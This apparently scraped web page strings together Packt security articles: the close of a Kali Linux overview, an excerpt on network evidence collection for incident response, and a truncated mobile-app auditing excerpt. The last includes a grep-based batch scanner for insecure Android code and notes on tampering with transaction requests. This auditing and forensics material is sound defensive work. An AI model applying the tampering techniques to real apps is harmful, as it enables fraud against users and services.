Security continues to evolve, so it's best to integrate it into the application development lifecycle. Security vulnerabilities within your app are almost impossible to avoid entirely; to identify them, one must think like an attacker and test the web-based application thoroughly. A Debian Linux derivative from Offensive Security Limited, Kali Linux is aimed primarily at digital forensics and penetration testing. It is the successor to the revered BackTrack Linux project. The BackTrack project was based on Knoppix and manually maintained; Offensive Security wanted a true Debian derivative, with all the necessary infrastructure and improved packaging techniques. Quality, stability, and a wide software selection were key considerations in choosing Debian. While developers churn out web-based applications by the minute, the number of attacks on web-based applications grows exponentially alongside them. Attackers are interested in exploiting flaws in the applications, while organizations want the best way to detect attackers' footprints in the web application firewall, so that the specific attack patterns aimed at the web-based application can be detected and blocked.

Key features of Kali Linux

Kali Linux has 32-bit and 64-bit distributions for hosts relying on the x86 instruction set, as well as an image for the ARM architecture, built for the BeagleBoard computer and the ARM Chromebook from Samsung. Kali Linux is also available for other devices such as the Asus Chromebook Flip C100P, HP Chromebook, CuBox, CubieBoard 2, Raspberry Pi, Odroid U2, EfikaMX, Odroid XU, Odroid XU3, Utilite Pro, SS808, Galaxy Note 10.1, and BeagleBone Black, and there are plans to make distributions for more ARM devices. Android devices such as Google's Nexus line, the OnePlus One, and Galaxy models also run Kali Linux through Kali NetHunter, Offensive Security's project to ensure compatibility and porting to specific Android devices.
Via the Windows Subsystem for Linux (WSL), Windows 10 users can use any of the more than 600 ethical hacking tools within Kali Linux to expose vulnerabilities in web applications. The official Windows distribution is available from the Microsoft Store, and there are tools for various other systems and platforms.

Conclusion

Despite a plethora of tools dedicated to web app security and a robust curation mechanism, Kali Linux is the distribution of choice for exposing vulnerabilities in web-based applications. Other options include Kubuntu, Black Parrot OS, Cyborg Linux, BackBox Linux, and Wifislax. While being open source has helped its meteoric rise, Kali Linux is one of the better platforms for up-to-date security utilities. It remains the most advanced penetration testing platform out there, supporting a wide variety of devices and hardware platforms. Kali Linux also has decent documentation compared to numerous other open source projects, and there is a large, active, and vibrant community. You can easily install Kali Linux in VirtualBox on Windows to begin your hacking exploits right away. To discover further stealth techniques to remain undetected and defeat modern infrastructures, and to explore red teaming techniques for exploiting secured environments, do check out the book Mastering Kali Linux for Advanced Penetration Testing - Third Edition written by Vijay Kumar Velu and Robert Beggs.

Author Bio

Chris is a growth marketing and cybersecurity expert writer. He has contributed to sites such as "Cyber Defense Magazine," "Social Media News," and "MTA," as well as several cybersecurity magazines. He enjoys freelancing and helping others learn more about protecting themselves online. He's always curious and interested in learning about the latest developments in the field. He's currently the Editor in Chief for EveryCloud's media division.
Glen Singh on why Kali Linux is an arsenal for any cybersecurity professional [Interview]
3 cybersecurity lessons for e-commerce website administrators
Implementing Web application vulnerability scanners with Kali Linux [Tutorial]

Network Evidence Collection

Packt
05 Jul 2017
16 min read
In this article, Gerard Johansen, author of the book Digital Forensics and Incident Response, explains that the traditional focus of digital forensics has been to locate evidence on the host hard drive. Law enforcement officers interested in criminal activity such as fraud or child exploitation can find the vast majority of evidence required for prosecution on a single hard drive. In the realm of incident response, though, it is critical that the focus goes far beyond a suspected compromised system. There is a wealth of information to be obtained within the points along the flow of traffic from a compromised host to an external Command and Control server, for example.

This article focuses on the preparation, identification, and collection of evidence that is commonly found among network devices and along the traffic routes within an internal network. This collection is critical during an incident where an external threat source is commanding internal systems or is in the process of pilfering data out of the network. Network-based evidence is also useful when examining host evidence, as it provides a second source of event corroboration, which is extremely useful in determining the root cause of an incident.

Preparation

The ability to acquire network-based evidence is largely dependent on the preparations undertaken by an organization prior to an incident. Without some critical components of a proper infrastructure security program, key pieces of evidence will not be available to incident responders in a timely manner. The result is that evidence may be lost as the CSIRT members hunt down critical pieces of information. In terms of preparation, organizations can aid the CSIRT by having proper network documentation, up-to-date configurations of network devices, and a central log management solution in place.
Aside from the technical preparation for network evidence collection, CSIRT personnel need to be aware of any legal or regulatory issues regarding the collection of network evidence. CSIRT personnel need to be aware that capturing network traffic can be considered an invasion of privacy absent any policy to the contrary. Therefore, the legal representative of the CSIRT should ensure that all employees of the organization understand that their use of the information system can be monitored. This should be expressly stated in policies prior to any evidence collection that may take place.

Network diagram

To identify potential sources of evidence, incident responders need to have a solid understanding of what the internal network infrastructure looks like. One method that can be employed by organizations is to create and maintain an up-to-date network diagram. This diagram should be detailed enough that incident responders can identify individual network components such as switches, routers, or wireless access points. This diagram should also contain internal IP addresses so that incident responders can immediately access those systems through remote methods. For instance, examine the simple network diagram below: This diagram allows for quick identification of potential evidence sources. Suppose, for example, that the laptop connected to the switch at 192.168.2.1 is identified as communicating with a known malware Command and Control server. A CSIRT analyst could examine the network diagram and ascertain that the C2 traffic would have to traverse several network hardware components on its way out of the internal network: there would be traffic traversing the switch at 192.168.10.1, through the firewall at 192.168.0.1, and finally through the router out to the Internet. 
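The path-walking exercise above can be sketched in a few lines of Python. The topology map below is hypothetical, mirroring the diagram just described; each device on the returned path is a potential evidence source (logs, CAM tables, flow records):

```python
# Sketch: map each device to its upstream neighbor, then walk the map to list
# every device that outbound traffic from a host traverses. The topology and
# device names here are invented for illustration.
UPSTREAM = {
    "laptop": "switch (192.168.2.1)",
    "switch (192.168.2.1)": "switch (192.168.10.1)",
    "switch (192.168.10.1)": "firewall (192.168.0.1)",
    "firewall (192.168.0.1)": "router (edge)",
    "router (edge)": "Internet",
}

def evidence_path(host):
    """Return the ordered list of devices between `host` and the Internet."""
    path = []
    hop = UPSTREAM.get(host)
    while hop is not None and hop != "Internet":
        path.append(hop)
        hop = UPSTREAM.get(hop)
    return path

for device in evidence_path("laptop"):
    print(device)
```

In a real engagement the map would come from the network documentation described above; the point is that a current diagram turns "where could evidence live?" into a mechanical lookup.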
Configuration

Determining whether an attacker has made modifications to a network device such as a switch or a router is easier if the CSIRT has a standard configuration immediately available. Organizations should already have configurations for network devices stored for disaster recovery purposes, but these should also be available to CSIRT members in the event of an incident.

Logs and log management

The lifeblood of a good incident investigation is evidence from a wide range of sources. Even something as common as a malware infection on a host system requires corroboration among a variety of sources. One common challenge with incident response, especially in smaller networks, is how the organization handles log management. For a comprehensive investigation, incident response analysts need access to as much network data as possible. All too often, organizations do not dedicate the proper resources to enabling comprehensive logs from network devices and other systems. Prior to any incident, it is critical to clearly define how and what an organization will log, as well as how it will maintain those logs. This should be established within a log management policy and associated procedure. The CSIRT personnel should be involved in any discussion as to which logs are necessary, as they will often have insight into the value of one log source over another. NIST has published a short guide to log management, available at: http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-92.pdf. Aside from the technical issues regarding log management, there are legal issues that must be addressed. The following are some issues that should be addressed by the CSIRT and its legal support prior to any incident:

- Establish logging as a normal business practice: Depending on the type of business and the jurisdiction, users may have a reasonable expectation of privacy absent any expressly stated monitoring policy. 
In addition, if logs are enabled strictly to determine a user's potential malicious activity, there may be legal issues. As a result, the logging policy should establish that logging of network activity is part of the normal business activity and that users do not have a reasonable expectation of privacy.

- Logging as close to the event: This is not so much an issue with automated logging, as entries are often created almost as the event occurs. From an evidentiary standpoint, logs that are not created close to the event lose their value as evidence in a courtroom.
- Knowledgeable Personnel: The value of logs often depends on who created the entry and whether they were knowledgeable about the event. In the case of logs from network devices, the logging software addresses this issue. As long as the software can be demonstrated to be functioning properly, there should be no issue.
- Comprehensive Logging: Enterprise logging should be configured for as much of the enterprise as possible. In addition, logging should be consistent. A random pattern of logging will have less value in a court than a consistent pattern of logging across the entire enterprise.
- Qualified Custodian: The logging policy should name a data custodian. This individual would speak to the logging and the types of software utilized to create the logs. They would also be responsible for testifying to the accuracy of the logs and the logging software used.
- Document Failures: Prolonged failures, or a history of failures, in the logging of events may diminish their value in a courtroom. It is imperative that any logging failure be documented and a reason associated with the failure.
- Log File Discovery: Organizations should be aware that logs utilized within a courtroom proceeding will be made available to opposing legal counsel.
- Logs from compromised systems: Logs that originate from a known compromised system are suspect. 
In the event that these logs are to be introduced as evidence, the custodian or incident responder will often have to testify at length concerning the veracity of the data contained within them.
- Original copies are preferred: Log files can be copied from the log source to media. As a further step, any logs should be archived off the system as well. Incident responders should establish a chain of custody for each log file used throughout the incident, and these logs should be maintained as part of the case until an order from the court is obtained allowing their destruction.

Network device evidence

There are a number of log sources that can provide CSIRT personnel and incident responders with good information. Each of these network devices is produced by a range of manufacturers. As a preparation task, CSIRT personnel should become familiar with how to access these devices and obtain the necessary evidence:

- Switches: These are spread throughout a network through a combination of core switches, which handle traffic from a range of network segments, and edge switches, which handle the traffic for individual segments. As a result, traffic that originates on a host and travels out of the internal network will traverse a number of switches. Switches have two key points of evidence that should be addressed by incident responders. The first is the Content Addressable Memory (CAM) table. This CAM table maps the physical ports on the switch to the Network Interface Card (NIC) of each device connected to the switch. Incident responders can utilize this information to trace connections to specific network jacks, which can aid in the identification of possible rogue devices. The second way switches can aid in an incident investigation is by facilitating network traffic capture.
- Routers: Routers allow organizations to connect multiple LANs into either Metropolitan Area Networks or Wide Area Networks. As a result, they handle an extensive amount of traffic. 
The key piece of evidentiary information that routers contain is the routing table. This table holds the information for the specific physical ports that map to the networks. Routers can also be configured to deny specific traffic between networks and to maintain logs on allowed traffic and data flow.
- Firewalls: Firewalls have changed significantly since the days when they were considered just a different type of router. Next-generation firewalls contain a wide variety of features such as intrusion detection and prevention, web filtering, data loss prevention, and detailed logs about allowed and denied traffic. Firewalls often serve as the detection mechanism that alerts security personnel to potential incidents. Incident responders should have as much visibility as possible into how their organization's firewalls function and what data can be obtained prior to an incident.
- Network Intrusion Detection and Prevention systems: These systems were purposefully designed to provide security personnel and incident responders with information concerning potential malicious activity on the network infrastructure. These systems utilize a combination of network monitoring and rule sets to determine whether there is malicious activity. Intrusion Detection Systems are often configured to alert on specific malicious activity, while Intrusion Prevention Systems can not only detect but also block potential malicious activity. In either case, the logs of both types of platforms are an excellent place for incident responders to locate specific evidence of malicious activity.
- Web Proxy Servers: Organizations often utilize web proxy servers to control how users interact with websites and other Internet-based resources. As a result, these devices can give an enterprise-wide picture of web traffic that both originates from and is destined for internal hosts. Web proxies also have the additional feature of alerting on connections to known malware Command and Control (C2) servers or websites that serve up malware. 
A review of web proxy logs in conjunction with a possibly compromised host may identify a source of malicious traffic or a C2 server exerting control over the host.
- Domain Controllers / Authentication Servers: Serving the entire network domain, authentication servers are the primary location that incident responders can leverage for details on successful or unsuccessful logins, credential manipulation, or other credential use.
- DHCP Server: Maintaining a static list of IP addresses assigned to workstations or laptops within the organization would require an inordinate amount of upkeep. The use of the Dynamic Host Configuration Protocol allows for the dynamic assignment of IP addresses to systems on the LAN. DHCP servers often contain logs on the assignment of IP addresses mapped to the MAC address of the host's NIC. This becomes important if an incident responder has to track down a specific workstation or laptop that was connected to the network at a specific date and time.
- Application Servers: A wide range of applications, from email to web applications, is housed on network servers. Each of these can provide logs specific to the type of application.

Network devices such as switches, routers, and firewalls also have their own internal logs that maintain data on access and changes. Incident responders should become familiar with the types of network devices on their organization's network and also be able to access these logs in the event of an incident.

Security Information and Event Management systems

A significant challenge that a great many organizations have is the nature of logging on network devices. With limited space, log files are often rolled over, with new log files written over older ones. The result is that, in some cases, an organization may have only a few days or even a few hours of important logs. If a potential incident happened several weeks ago, the incident response personnel will be without critical pieces of evidence. 
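As a small illustration of the DHCP lookup described above (mapping an IP address at a specific date and time back to a MAC address), here is a hedged Python sketch. The lease-record format is invented for the example; real DHCP server logs (ISC dhcpd, Windows DHCP, and so on) differ by product:

```python
from datetime import datetime

# Sketch: find which MAC address held a given IP at a given time, from a
# simplified set of DHCP lease records (ip, mac, lease_start, lease_end).
LEASES = [
    ("10.0.4.21", "aa:bb:cc:dd:ee:01", "2017-06-01 08:00", "2017-06-01 16:00"),
    ("10.0.4.21", "aa:bb:cc:dd:ee:02", "2017-06-01 16:05", "2017-06-02 00:05"),
]

def _ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M")

def mac_for(ip, when):
    """Return the MAC that leased `ip` at time `when`, or None."""
    t = _ts(when)
    for lease_ip, mac, start, end in LEASES:
        if lease_ip == ip and _ts(start) <= t <= _ts(end):
            return mac
    return None

print(mac_for("10.0.4.21", "2017-06-01 18:30"))  # -> aa:bb:cc:dd:ee:02
```

The same IP resolves to different machines at different times, which is exactly why lease timestamps, not just addresses, must be preserved as evidence.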
One tool that has been embraced by a number of enterprises is a Security Information and Event Management (SIEM) system. These appliances have the ability to aggregate log and event data from network sources and combine them into a single location. This allows the CSIRT and other security personnel to observe activity across the entire network without having to examine individual systems. The diagram below illustrates how a SIEM integrates into the overall network: A variety of sources, from security controls to SQL databases, are configured to send logs to the SIEM. In this case, the SQL database located at 10.100.20.18 indicates that the user account USSalesSyncAcct was utilized to copy a database to the remote host located at 10.88.6.12. The SIEM allows for quick examination of this type of activity. For example, if it is determined that the account USSalesSyncAcct has been compromised, CSIRT analysts can quickly query the SIEM for any usage of that account. From there, they would be able to see the log entry that indicated a copy of a database to the remote host. Without the SIEM, CSIRT analysts would have to search each individual system that might have been accessed, a process that may be prohibitive. From the SIEM platform, security and network analysts have the ability to perform a number of different tasks related to incident response:

- Log Aggregation: Typical enterprises have several thousand devices within the internal network, each with its own logs; the SIEM can be deployed to aggregate these logs in a central location.
- Log Retention: Another key feature that SIEM platforms provide is log retention. Compliance frameworks such as the Payment Card Industry Data Security Standard (PCI-DSS) stipulate that logs should be maintained for a period of one year, with 90 days immediately available. SIEM platforms can aid with log management by archiving logs in an orderly fashion and allowing for their immediate retrieval. 
- Routine Analysis: It is advisable to conduct periodic reviews of the information on a SIEM platform. SIEM platforms often provide a dashboard that highlights key elements such as the number of connections, data flow, and any critical alerts. SIEMs also allow for reporting so that stakeholders can be kept informed of activity.
- Alerting: SIEM platforms have the ability to alert on specific conditions that may indicate malicious activity. This can include alerts from security controls such as antivirus, intrusion prevention, or intrusion detection systems. Another key feature of SIEM platforms is event correlation. This technique examines the log files and determines whether there is a link or any commonality between events. The SIEM then has the capability to alert on these types of events. For example, if a user account attempts multiple logins across a number of systems in the enterprise, the SIEM can identify that activity and alert on it.
- Incident Response: As the SIEM becomes the single point for log aggregation and analysis, CSIRT analysts will often make use of it during an incident. They will often run queries on the platform as well as download logs for offline analysis. Because of the centralization of log files, the time needed to conduct searches and event collection is significantly reduced. For example, suppose a CSIRT analyst has indicated that a user account has been compromised. Without a SIEM, the analyst would have to check various systems for any activity pertaining to that user account. With a SIEM in place, the analyst simply searches for that user account on the SIEM platform, which has aggregated user account activity logs from systems all over the enterprise. The result is that the analyst has a clear idea of the user account's activity in a fraction of the time it would have taken to examine logs from various systems throughout the enterprise.

SIEM platforms do entail a good deal of time and money to purchase and implement. 
Adding to that cost is the constant upkeep, maintenance, and modification of rules that is necessary. From an incident response perspective, though, a properly configured and maintained SIEM is vital to gathering network-based evidence in a timely manner. In addition, the features and capabilities of SIEM platforms can significantly reduce the time it takes to determine the root cause of an incident once it has been detected. The following article has an excellent breakdown and use cases of SIEM platforms in enterprise environments: https://gbhackers.com/security-information-and-event-management-siem-a-detailed-explanation/.

Security Onion

Full-featured SIEM platforms may be cost-prohibitive for some organizations. One option that is available is the open source platform Security Onion. Security Onion ties a wide range of security tools, such as OSSEC, Suricata, and Snort, into a single platform. It also has features such as dashboards and tools for deep analysis of log files. For example, the following screenshot shows the level of detail available: Although installing and deploying Security Onion may require some investment of time, it is a powerful, low-cost alternative for organizations that cannot deploy a full-featured SIEM solution. (The Security Onion platform and associated documentation are available at https://securityonion.net/.)

Summary

Evidence that is pertinent to incident responders is not located only on the hard drive of a compromised host. There is a wealth of information available from network devices spread throughout the environment. With proper preparation, a CSIRT may be able to leverage the evidence provided by these devices through solutions such as a SIEM. CSIRT personnel also have the ability to capture network traffic for later analysis through a variety of methods and tools. 
Behind all of these techniques, though, are the legal and policy implications that CSIRT personnel and the organization at large need to navigate. By preparing for the legal and technical challenges of network evidence collection, CSIRT members can leverage this evidence and move closer to the goal of determining the root cause of an incident and bringing the organization back to operations.

Resources for Article:

Further resources on this subject:
- Selecting and Analyzing Digital Evidence [article]
- Digital and Mobile Forensics [article]
- BackTrack Forensics [article]
Packt
08 Jul 2016
48 min read

Auditing Mobile Applications

In this article by Prashant Verma and Akshay Dikshit, authors of the book Mobile Device Exploitation Cookbook, we will cover the following topics:

- Auditing Android apps using static analysis
- Auditing Android apps using a dynamic analyzer
- Using Drozer to find vulnerabilities in Android applications
- Auditing iOS application using static analysis
- Auditing iOS application using a dynamic analyzer
- Examining iOS App Data storage and Keychain security vulnerabilities
- Finding vulnerabilities in WAP-based mobile apps
- Finding client-side injection
- Insecure encryption in mobile apps
- Discovering data leakage sources
- Other application-based attacks in mobile devices
- Launching intent injection in Android

Mobile applications, like web applications, may have vulnerabilities. These vulnerabilities are in most cases the result of bad programming practices or insecure coding techniques, or of purposefully injected bad code. For users and organizations, it is important to know how vulnerable their applications are. Should they fix the vulnerabilities or keep/stop using the applications? To address this dilemma, mobile applications need to be audited with the goal of uncovering vulnerabilities. Mobile applications (Android, iOS, or other platforms) can be analyzed using static or dynamic techniques. Static analysis is conducted by employing certain text- or string-based searches across decompiled source code. Dynamic analysis is conducted at runtime, and vulnerabilities are uncovered in a simulated fashion. Dynamic analysis is difficult compared to static analysis. In this article, we will employ both static and dynamic analysis to audit Android and iOS applications. We will also learn various other audit techniques, including Drozer framework usage, WAP-based application audits, and typical mobile-specific vulnerability discovery. 
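The string-search idea behind static analysis, described above, can be sketched in a few lines of Python. The patterns below are illustrative only, not an exhaustive rule set, and the scanner operates on any decompiled source text you feed it:

```python
import re

# Sketch: the core of string-based static analysis is matching insecure code
# patterns against decompiled source lines. These patterns are illustrative.
PATTERNS = {
    "weak-crypto": re.compile(r"MD5|base64|\bDES\b", re.IGNORECASE),
    "cleartext-http": re.compile(r"http://"),
    "logging": re.compile(r"\bLog\.(d|v|i|w|e)\b"),
}

def scan(source):
    """Return {finding_name: [line_numbers]} for one source file's text."""
    findings = {}
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in PATTERNS.items():
            if pattern.search(line):
                findings.setdefault(name, []).append(lineno)
    return findings

sample = 'String u = "http://bank.example/login";\nLog.d("auth", u);'
print(scan(sample))  # -> {'cleartext-http': [1], 'logging': [2]}
```

This is essentially what the batch script in the first recipe below does with grep, one output file per pattern.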
Auditing Android apps using static analysis

Static analysis is the most commonly and easily applied analysis method in source code audits. Static, by definition, means something that is constant. Static analysis is conducted on static code, that is, raw or decompiled source code or compiled (object) code, but the analysis is conducted without the runtime. In most cases, static analysis becomes code analysis via static string searches. A very common scenario is to figure out vulnerable or insecure code patterns and find the same in the entire application code.

Getting ready

For conducting static analysis of Android applications, we need at least one Android application and a static code scanner. Pick any Android application of your choice and use any static analyzer tool of your choice. In this recipe, we use Insecure Bank, which is a vulnerable Android application for Android security enthusiasts. We will also use ScriptDroid, which is a static analysis script. Both Insecure Bank and ScriptDroid are coded by Android security researcher Dinesh Shetty.

How to do it...

Perform the following steps:

- Download the latest version of the Insecure Bank application from GitHub.
- Decompress or unzip the .apk file and note the path of the unzipped application. 
Create a ScriptDroid.bat file by using the following code (the backslashes in the paths below have been restored, as they were stripped during formatting):

@ECHO OFF
SET /P Filelocation=Please Enter Location:
mkdir %Filelocation%\OUTPUT

:: Code to check for presence of Comments
grep -H -i -n -e "//" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_comment.txt"
type -H -i "%Filelocation%\*.java" | gawk "/\/\*/,/\*\//" >> "%Filelocation%\OUTPUT\MultilineComments.txt"
grep -H -i -n -v "TODO" "%Filelocation%\OUTPUT\Temp_comment.txt" >> "%Filelocation%\OUTPUT\SinglelineComments.txt"
del %Filelocation%\OUTPUT\Temp_comment.txt

:: Code to check for insecure usage of SharedPreferences
grep -H -i -n -C2 -e "putString" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\verify_sharedpreferences.txt"
grep -H -i -n -C2 -e "MODE_PRIVATE" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Modeprivate.txt"
grep -H -i -n -C2 -e "MODE_WORLD_READABLE" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Worldreadable.txt"
grep -H -i -n -C2 -e "MODE_WORLD_WRITEABLE" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Worldwritable.txt"
grep -H -i -n -C2 -e "addPreferencesFromResource" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\verify_sharedpreferences.txt"

:: Code to check for possible TapJacking attack
grep -H -i -n -e filterTouchesWhenObscured="true" "%Filelocation%\..\..\..\..\res\layout\*.xml" >> "%Filelocation%\OUTPUT\Temp_tapjacking.txt"
grep -H -i -n -e "<Button" "%Filelocation%\..\..\..\..\res\layout\*.xml" >> "%Filelocation%\OUTPUT\tapjackings.txt"
grep -H -i -n -v filterTouchesWhenObscured="true" "%Filelocation%\OUTPUT\tapjackings.txt" >> "%Filelocation%\OUTPUT\Temp_tapjacking.txt"
del %Filelocation%\OUTPUT\Temp_tapjacking.txt

:: Code to check usage of external storage card for storing information
grep -H -i -n -e "WRITE_EXTERNAL_STORAGE" "%Filelocation%\..\..\..\..\AndroidManifest.xml" >> "%Filelocation%\OUTPUT\SdcardStorage.txt"
grep -H -i -n -e "getExternalStorageDirectory()" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\SdcardStorage.txt"
grep -H -i -n -e "sdcard" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\SdcardStorage.txt"

:: Code to check for possible javascript injection
grep -H -i -n -e "addJavascriptInterface()" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_probableXss.txt"
grep -H -i -n -e "setJavaScriptEnabled(true)" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_probableXss.txt"
grep -H -i -n -v "import" "%Filelocation%\OUTPUT\Temp_probableXss.txt" >> "%Filelocation%\OUTPUT\probableXss.txt"
del %Filelocation%\OUTPUT\Temp_probableXss.txt

:: Code to check for presence of possible weak algorithms
grep -H -i -n -e "MD5" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_weakencryption.txt"
grep -H -i -n -e "base64" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_weakencryption.txt"
grep -H -i -n -e "des" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_weakencryption.txt"
grep -H -i -n -v "import" "%Filelocation%\OUTPUT\Temp_weakencryption.txt" >> "%Filelocation%\OUTPUT\Weakencryption.txt"
del %Filelocation%\OUTPUT\Temp_weakencryption.txt

:: Code to check for weak transportation medium
grep -H -i -n -C3 "http://" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_overhttp.txt"
grep -H -i -n -C3 -e "HttpURLConnection" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_overhttp.txt"
grep -H -i -n -C3 -e "URLConnection" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_OtherUrlConnection.txt"
grep -H -i -n -C3 -e "URL" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_OtherUrlConnection.txt"
grep -H -i -n -e "TrustAllSSLSocket-Factory" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\BypassSSLvalidations.txt"
grep -H -i -n -e "AllTrustSSLSocketFactory" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\BypassSSLvalidations.txt"
grep -H -i -n -e "NonValidatingSSLSocketFactory" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\BypassSSLvalidations.txt"
grep -H -i -n -v "import" "%Filelocation%\OUTPUT\Temp_OtherUrlConnection.txt" >> "%Filelocation%\OUTPUT\OtherUrlConnections.txt"
del %Filelocation%\OUTPUT\Temp_OtherUrlConnection.txt
grep -H -i -n -v "import" "%Filelocation%\OUTPUT\Temp_overhttp.txt" >> "%Filelocation%\OUTPUT\UnencryptedTransport.txt"
del %Filelocation%\OUTPUT\Temp_overhttp.txt

:: Code to check for Autocomplete ON
grep -H -i -n -e "<Input" "%Filelocation%\..\..\..\..\res\layout\*.xml" >> "%Filelocation%\OUTPUT\Temp_autocomp.txt"
grep -H -i -n -v "textNoSuggestions" "%Filelocation%\OUTPUT\Temp_autocomp.txt" >> "%Filelocation%\OUTPUT\AutocompleteOn.txt"
del %Filelocation%\OUTPUT\Temp_autocomp.txt

:: Code to check presence of possible SQL Content
grep -H -i -n -e "rawQuery" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_sqlcontent.txt"
grep -H -i -n -e "compileStatement" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_sqlcontent.txt"
grep -H -i -n -e "db" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_sqlcontent.txt"
grep -H -i -n -e "sqlite" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_sqlcontent.txt"
grep -H -i -n -e "database" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_sqlcontent.txt"
grep -H -i -n -e "insert" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_sqlcontent.txt"
grep -H -i -n -e "delete" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_sqlcontent.txt"
grep -H -i -n -e "select" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_sqlcontent.txt"
grep -H -i -n -e "table" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_sqlcontent.txt"
grep -H -i -n -e "cursor" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_sqlcontent.txt"
grep -H -i -n -v "import" "%Filelocation%\OUTPUT\Temp_sqlcontent.txt" >> "%Filelocation%\OUTPUT\Sqlcontents.txt"
del %Filelocation%\OUTPUT\Temp_sqlcontent.txt

:: Code to check for Logging mechanism
grep -H -i -n -F "Log." "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Logging.txt"

:: Code to check for Information in Toast messages
grep -H -i -n -e "Toast.makeText" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_Toast.txt"
grep -H -i -n -v "//" "%Filelocation%\OUTPUT\Temp_Toast.txt" >> "%Filelocation%\OUTPUT\Toast_content.txt"
del %Filelocation%\OUTPUT\Temp_Toast.txt

:: Code to check for Debugging status
grep -H -i -n -e "android:debuggable" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\DebuggingAllowed.txt"

:: Code to check for presence of Device Identifiers
grep -H -i -n -e "uid|user-id|imei|deviceId|deviceSerialNumber|devicePrint|X-DSN|phone |mdn|did|IMSI|uuid" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\Temp_Identifiers.txt"
grep -H -i -n -v "//" "%Filelocation%\OUTPUT\Temp_Identifiers.txt" >> "%Filelocation%\OUTPUT\Device_Identifier.txt"
del %Filelocation%\OUTPUT\Temp_Identifiers.txt

:: Code to check for presence of Location Info
grep -H -i -n -e "getLastKnownLocation()|requestLocationUpdates()|getLatitude()|getLongitude() |LOCATION" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\LocationInfo.txt"

:: Code to check for possible Intent Injection
grep -H -i -n -C3 -e "Action.getIntent(" "%Filelocation%\*.java" >> "%Filelocation%\OUTPUT\IntentValidation.txt"

How it works...

Go to the command prompt and navigate to the path where ScriptDroid is placed. Run the .bat file, and it prompts you to input the path of the application on which you wish to perform static analysis. In our case we provide it with the path of the Insecure Bank application, precisely the path where the Java files are stored. If everything worked correctly, the screen should look like the following: The script generates a folder by the name OUTPUT in the path where the Java files of the application are present. The OUTPUT folder contains multiple text files, each one corresponding to a particular vulnerability. The individual text files pinpoint the location of vulnerable code pertaining to the vulnerability under discussion. 
The combination of ScriptDroid and Insecure Bank gives a very nice view of various Android vulnerabilities; usually the same is not possible with live apps. Consider the following points, for instance:

- Weakencryption.txt lists the instances of Base64 encoding used for passwords in the Insecure Bank application
- Logging.txt contains the list of insecure log functions used in the application
- SdcardStorage.txt contains the code snippets pertaining to data storage in SD cards

Details like these from static analysis are eye-openers in letting us know of the vulnerabilities in our application, without even running the application.

There's more...

The current recipe used just ScriptDroid, but there are many other options available. You can either choose to write your own script or you may use one of the free or commercial tools. A few commercial tools have pioneered the static analysis approach over the years via their dedicated focus.

See also

- https://github.com/dineshshetty/Android-InsecureBankv2
- Auditing iOS application using static analysis

Auditing Android apps using a dynamic analyzer

Dynamic analysis is another technique applied in source code audits. Dynamic analysis is conducted at runtime: the application is run or simulated, and the flaws or vulnerabilities are discovered while the application is running. Dynamic analysis can be tricky, especially in the case of mobile platforms. As opposed to static analysis, there are certain requirements in dynamic analysis, such as the analyzer environment needing to be a runtime or a simulation of the real runtime. Dynamic analysis can be employed to find vulnerabilities in Android applications which are difficult to find via static analysis. A static analysis may let you know that a password is going to be stored, but dynamic analysis reads the memory and reveals the password stored at runtime. 
Dynamic analysis can be helpful in tampering with data in transmission during runtime, that is, tampering with the amount in a transaction request being sent to the payment gateway. Some Android applications employ obfuscation to prevent attackers from reading the code; dynamic analysis changes the whole game in such cases by revealing the hardcoded data being sent out in requests, which is otherwise not readable in static analysis.

Getting ready

For conducting dynamic analysis of Android applications, we need at least one Android application and a dynamic code analyzer tool. Pick any Android application of your choice and use any dynamic analyzer tool of your choice. The dynamic analyzer tools can be classified under two categories:

- Tools which run from computers and connect to an Android device or emulator (to conduct dynamic analysis)
- Tools that can run on the Android device itself

For this recipe, we choose a tool belonging to the latter category.

How to do it...

Perform the following steps for conducting dynamic analysis:

- Have an Android device with the applications (to be analyzed dynamically) installed.
- Go to the Play Store and download Andrubis. Andrubis is a tool from iSecLabs which runs on Android devices and conducts static, dynamic, and URL analysis on the installed applications. We will use it for dynamic analysis only in this recipe.
- Open the Andrubis application on your Android device. It displays the applications installed on the Android device and analyzes these applications.

How it works...

